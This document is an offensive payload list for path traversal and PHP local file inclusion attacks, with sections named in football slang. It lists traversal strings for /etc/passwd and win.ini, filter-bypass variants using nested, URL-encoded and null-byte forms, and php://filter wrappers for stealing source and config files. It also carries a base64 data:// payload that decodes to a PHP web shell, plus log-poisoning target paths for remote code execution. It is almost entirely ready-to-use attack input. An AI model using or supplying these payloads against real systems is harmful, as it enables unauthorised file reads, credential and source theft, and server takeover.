# ———— SANCHEZ TACTICAL PAYLOADS (2025) ————

# [SECTION 1: The "Tap-Ins" (Standard Linux)]
../../../../etc/passwd
../../../../../../etc/passwd
/etc/passwd

# [SECTION 2: The "Tap-Ins" (Standard Windows)]
../../../../windows/win.ini
../../../../../../windows/win.ini
c:\windows\win.ini

# [SECTION 3: The "Nutmegs" (WAF Bypass - Nested)]
# Many WAFs strip "../" once. So "....//" becomes "../"
....//....//....//....//etc/passwd
....\/....\/....\/....\/etc/passwd
....//....//....//....//windows/win.ini

# [SECTION 4: The "Tekkers" (Encoding)]
# URL Encoded "../"
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
# Double URL Encoded (For strict filters)
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

# [SECTION 5: The "Null Byte" (Legacy/C-Backend)]
# Truncates the file extension appended by the server
../../../../etc/passwd%00
../../../../windows/win.ini%00

# [SECTION 6: The "Wrappers" (Source Code Theft)]
# Encodes the file to Base64 so it doesn't execute
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config.php
php://filter/read=string.rot13/resource=index.php

# [SECTION 7: The "Auto-RCE" Triggers]
# Our script detects these and switches to POST + Shell
php://input
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

# [SECTION 8: The "Log Poisoning" (Linux Targets)]
# If you poisoned the User-Agent, you need to include these files
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/nginx/access.log
/var/log/auth.log
/proc/self/environ
/proc/self/fd/0
/proc/self/fd/1

# [SECTION 9: The "Log Poisoning" (Windows Targets)]
c:\xampp\apache\logs\access.log
c:\wamp\logs\access.log